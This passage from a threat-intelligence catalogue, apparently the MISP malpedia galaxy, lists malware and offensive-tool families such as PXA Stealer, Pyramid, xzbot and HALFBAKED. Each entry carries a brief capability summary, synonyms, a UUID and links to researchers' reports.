- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf - webarchive
- https://github.com/n1nj4sec/pupy - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PXA Stealer
PXA Stealer is an information-stealing malware written in Python, identified by Cisco Talos in an active campaign attributed to a Vietnamese-speaking threat actor (2024). The stealer targets sensitive data such as credentials for online accounts, VPN and FTP clients, financial information, browser cookies, and gaming-related data. Notably, PXA Stealer is capable of decrypting browser master passwords to exfiltrate stored credentials. The campaign leverages heavily obfuscated batch scripts for delivery and execution. The actor behind this operation is linked to the Telegram channel "Mua Bán Scan MINI", known to host credential trade and cybercrime activity. While there are connections to the CoralRaider adversary, attribution to this group remains unconfirmed. In Q2 2025, PXA Stealer was observed targeting Italy.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PXA Stealer.
| Known Synonyms |
|---|
| PXA |
| PXAStealer |
Internal MISP references
UUID 69aae68f-9831-4568-b3a7-0f492fea8c70 which can be used as unique global reference for PXA Stealer in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.pxa_stealer - webarchive
- https://www.sentinelone.com/labs/ghost-in-the-zip-new-pxa-stealer-and-its-telegram-powered-ecosystem/ - webarchive
- https://x.com/luc4m/status/1934864757619900789 - webarchive
- https://labs.beazley.security/articles/ghost-in-the-zip-or-new-pxa-stealer-and-its-telegram-powered-ecosystem - webarchive
- https://www.darkrym.com/posts/2025/08/pxa-stealers-evolution-to-purerat-part-3-weaponised-python-stage-stage-5/ - webarchive
- https://blog.talosintelligence.com/new-pxa-stealer/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PyAesLoader
Internal MISP references
UUID b9ba4f66-78dc-491f-8fd4-0143816ce80e which can be used as unique global reference for PyAesLoader in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PyArk
Internal MISP references
UUID 01f15f4e-dd40-4246-9b99-c0d81306e37f which can be used as unique global reference for PyArk in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
pyback
Internal MISP references
UUID 6d96cd1e-98f4-4784-9982-397c5df19bd9 which can be used as unique global reference for pyback in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PylangGhost
Python version of the GolangGhost RAT.
Internal MISP references
UUID 94ef1dd3-dc31-4dfa-8b09-5e0aefb8d29e which can be used as unique global reference for PylangGhost in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.pylangghost - webarchive
- https://blog.talosintelligence.com/python-version-of-golangghost-rat/ - webarchive
- https://blog.polyswarm.io/famous-chollimas-pylangghost - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2025/papers/DeceptiveDevelopment-and-North-Korean-IT-workers-from-primitive-crypto-theft-to-sophisticated-AI-based-deception.pdf - webarchive
- https://any.run/cybersecurity-blog/pylangghost-malware-analysis/ - webarchive
- https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-from-primitive-crypto-theft-to-sophisticated-ai-based-deception/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Pyramid
According to its author, Pyramid is a post-exploitation framework written in Python, capable of executing offensive tooling from a signed binary (e.g. python.exe) by importing its dependencies in memory. It was created to demonstrate a bypass strategy against EDRs based on assumptions about their blind spots.
Internal MISP references
UUID d0c73fba-7dd5-49f9-a439-be0d960ebadb which can be used as unique global reference for Pyramid in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.pyramid - webarchive
- https://github.com/naksyn/Pyramid - webarchive
- https://hunt.io/blog/tracking-pyramid-c2-identifying-post-exploitation-servers - webarchive
- https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2 - webarchive
- https://hunt.io/blog/russian-speaking-actors-impersonate-etf-distribute-stealc-pyramid-c2 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PY#RATION
According to Securonix, this malware exhibits remote access trojan (RAT) behavior, allowing for control of and persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and capabilities, including data exfiltration and keylogging. What makes this malware particularly distinctive is its use of websockets for both command and control (C2) communication and exfiltration, as well as how it evades detection by antivirus and network security measures.
Internal MISP references
UUID 1dc471d3-6303-48a1-a17a-b4f29e5ba6a9 which can be used as unique global reference for PY#RATION in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PyVil
PyVil RAT
Internal MISP references
UUID 2cf75f3c-116f-4faf-bd32-ba3a5e2327cf which can be used as unique global reference for PyVil in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
QUIETBOARD
Internal MISP references
UUID 6ebeed34-4a7d-44d8-ae44-83ae37cf5f2f which can be used as unique global reference for QUIETBOARD in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RedTiger Stealer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedTiger Stealer.
| Known Synonyms |
|---|
| RedTiger Ste4ler |
| redtiger |
| redtiger-tools |
Internal MISP references
UUID 045c0d7d-4840-4052-ad26-528e89a285b4 which can be used as unique global reference for RedTiger Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Responder
Responder is an LLMNR, NBT-NS and mDNS poisoner with a built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Responder.
| Known Synonyms |
|---|
| SpiderLabs Responder |
Internal MISP references
UUID 3271b5ca-c044-4ab8-bbfc-0d6e1a6601fc which can be used as unique global reference for Responder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
RN Stealer
Internal MISP references
UUID e0b1891f-c1a4-43c3-9944-a84dc32dd371 which can be used as unique global reference for RN Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Saphyra
Internal MISP references
UUID 30a22cdb-9393-460b-86ae-08d97c626155 which can be used as unique global reference for Saphyra in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Serpent
According to Proofpoint, this is a backdoor written in Python, used in attacks against French entities in the construction, real estate, and government industries.
Internal MISP references
UUID 8052319b-f6da-4f53-a630-59245ff65eaf which can be used as unique global reference for Serpent in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.serpent - webarchive
- https://labs.k7computing.com/index.php/uncovering-the-serpent/ - webarchive
- https://www.bleepingcomputer.com/news/security/serpent-malware-campaign-abuses-chocolatey-windows-package-manager/ - webarchive
- https://blogs.vmware.com/security/2022/04/serpent-the-backdoor-that-hides-in-plain-sight.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
SpaceCow
Internal MISP references
UUID ff5c0845-6740-45d5-bd34-1cf69c635356 which can be used as unique global reference for SpaceCow in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
stealler
Internal MISP references
UUID 689247a2-4e75-4802-ab94-484fc3d6a18e which can be used as unique global reference for stealler in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Stitch
Internal MISP references
UUID 6239201b-a0bd-4f01-8bbe-79c6fc5fa861 which can be used as unique global reference for Stitch in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Stormous
Internal MISP references
UUID e2580f5e-417b-4f21-88ba-8d3e43514363 which can be used as unique global reference for Stormous in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
unidentified_002
Internal MISP references
UUID 7e5fe6ca-3323-409a-a5bb-d34f60197b99 which can be used as unique global reference for unidentified_002 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
unidentified_003
Internal MISP references
UUID 43282411-4999-4066-9b99-2e94a17acbd4 which can be used as unique global reference for unidentified_003 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
UPSTYLE
Internal MISP references
UUID 1824c463-77df-43af-a055-d94567918f6b which can be used as unique global reference for UPSTYLE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Venomous
Ransomware written in Python and delivered as a compiled executable created with PyInstaller.
Internal MISP references
UUID 0bd5aed2-9c74-41a5-9fcf-9379f2cb0e2c which can be used as unique global reference for Venomous in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Venus Stealer
Venus Stealer is a Python-based infostealer observed in early 2023.
Internal MISP references
UUID 20f72d3c-87b7-4349-ad1b-59d7909c1df4 which can be used as unique global reference for Venus Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
VileRAT
Internal MISP references
UUID aba54ca9-ef0d-4061-93d1-65251e90afad which can be used as unique global reference for VileRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
W4SP Stealer
A basic infostealer with some capability to inject code into legitimate applications.
Internal MISP references
UUID c4d46e47-3af8-4117-84ad-1e5699956f2b which can be used as unique global reference for W4SP Stealer in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WIREFIRE
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WIREFIRE.
| Known Synonyms |
|---|
| GIFTEDVISITOR |
Internal MISP references
UUID 54f3e853-5f0e-4940-9e27-79e6991886f9 which can be used as unique global reference for WIREFIRE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KV
Internal MISP references
UUID 37784130-81fd-40d7-87d4-38e5085513bd which can be used as unique global reference for KV in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/sh.kv - webarchive
- https://www.justice.gov/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical - webarchive
- https://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/ - webarchive
- https://censys.com/will-the-real-volt-typhoon-please-stand-up/ - webarchive
- https://www.securityweek.com/wp-content/uploads/2024/01/Volt-Typhoon.pdf - webarchive
- https://blog.lumen.com/kv-botnet-dont-call-it-a-comeback/ - webarchive
- https://pylos.co/2025/07/23/will-the-real-salt-typhoon-please-stand-up/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
PANIX
According to its author, PANIX is a powerful, modular, and highly customizable Linux persistence framework designed for security researchers, detection engineers, penetration testers, CTF enthusiasts, and more. Built with versatility in mind, PANIX emphasizes functionality, making it an essential tool for understanding and implementing a wide range of persistence techniques.
Internal MISP references
UUID 6f2badd8-1b67-4a93-be1e-0585f5359a08 which can be used as unique global reference for PANIX in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
xzbot
A backdoor introduced into versions 5.6.0 and 5.6.1 of the compression library/tool xz/liblzma, intended to enable access via (Open)SSH on affected servers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xzbot.
| Known Synonyms |
|---|
| xzorcist |
Internal MISP references
UUID 293b9d76-8e58-48bc-936b-e8dfb00f6f6c which can be used as unique global reference for xzbot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/sh.xzbot - webarchive
- https://github.com/karcherm/xz-malware - webarchive
- https://www.linkedin.com/posts/threatmon_xz-utils-backdoor-cve-2024-3094-activity-7181228442791641088-rw2a?utm_source=share&utm_medium=member_desktop - webarchive
- https://boehs.org/node/everything-i-know-about-the-xz-backdoor - webarchive
- https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504 - webarchive
- https://medium.com/@DCSO_CyTec/xz-backdoor-how-to-check-if-your-systems-are-affected-fb169b638271 - webarchive
- https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094 - webarchive
- https://www.openwall.com/lists/oss-security/2024/03/29/4 - webarchive
- https://www.wired.com/story/jia-tan-xz-backdoor/ - webarchive
- https://twitter.com/fr0gger_/status/1774342248437813525 - webarchive
- https://www.sentinelone.com/blog/xz-utils-backdoor-threat-actor-planned-to-inject-further-vulnerabilities/ - webarchive
- https://gynvael.coldwind.pl/?lang=en&id=782 - webarchive
- https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27 - webarchive
- https://github.com/amlweems/xzbot - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FlexiSpy (symbian)
Internal MISP references
UUID 9f85f4fc-1cce-4557-b3d8-b9ef522fafb2 which can be used as unique global reference for FlexiSpy (symbian) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
BASICSTAR
Internal MISP references
UUID ca86807d-5466-496a-b41f-4bde905f9064 which can be used as unique global reference for BASICSTAR in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
CageyChameleon
CageyChameleon is a VBS-based backdoor with the capability to enumerate the list of running processes and check for the presence of several antivirus products. CageyChameleon collects user and host information, information on currently running processes, etc. The collected information is sent back to the C2 server, and the backdoor continues to issue requests in order to carry out subsequent operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CageyChameleon.
| Known Synonyms |
|---|
| Cabbage RAT |
Internal MISP references
UUID ea71b7c1-79eb-4e9c-a670-ea75d80132f4 which can be used as unique global reference for CageyChameleon in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon - webarchive
- https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/ - webarchive
- https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf - webarchive
- https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf - webarchive
- https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314 - webarchive
- https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjCk7uOzMP-AhXOYMAKHYtLCKkQFnoECBIQAQ&url=https%3A%2F%2Fi.blackhat.com%2FUSA-22%2FThursday%2FUS-22-Wikoff-Talent-Need-Not-Apply.pdf&usg=AOvVaw0deqd7ozZyRTfSBOBmlbiG - webarchive
- https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/ - webarchive
- https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ - webarchive
- https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/ - webarchive
- https://sansorg.egnyte.com/dl/3P3HxFiNgL - webarchive
- https://www.clearskysec.com/cryptocore-group/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md - webarchive
- https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds - webarchive
- https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
forbiks
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular forbiks.
| Known Synonyms |
|---|
| Forbix |
Internal MISP references
UUID 2ad12163-3a8e-4ece-969e-ac616303ebe1 which can be used as unique global reference for forbiks in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GamaWiper
According to ClearSky, this is a VBS-based wiper, deployed via exploitation of a vulnerable WinRAR version (CVE-2025-80880). They assess with medium confidence a link to Gamaredon.
Internal MISP references
UUID 343e4c9d-8645-42a0-b2de-eca9f79734ff which can be used as unique global reference for GamaWiper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GGLdr
Internal MISP references
UUID 8ca31b9b-6e78-4dcc-9d14-dfd97d44994e which can be used as unique global reference for GGLdr in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GlowSpark
Internal MISP references
UUID ab6f8b6d-f0a0-4d2c-a81b-2dcb146914ea which can be used as unique global reference for GlowSpark in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Grinju Downloader
Internal MISP references
UUID f0a64323-62a6-4c5a-bb3d-44bd3b11507f which can be used as unique global reference for Grinju Downloader in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HALFBAKED
The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. HALFBAKED listens for the following commands from the C2 server:
- info: Sends victim machine information (OS, processor, BIOS and running processes) gathered using WMI queries
- processList: Sends the list of running processes
- screenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)
- runvbs: Executes a VB script
- runexe: Executes an EXE file
- runps1: Executes a PowerShell script
- delete: Deletes the specified file
- update: Updates the specified file
Internal MISP references
UUID 095c995c-c916-488e-944d-a3f4b9842926 which can be used as unique global reference for HALFBAKED in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked - webarchive
- https://attack.mitre.org/software/S0151/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
HATVIBE
According to Sekoia, the aim of this backdoor is to receive VBS modules for execution from a remote C2 server. Once received, HATVIBE uses a simple XOR algorithm to decrypt each module, contact it between two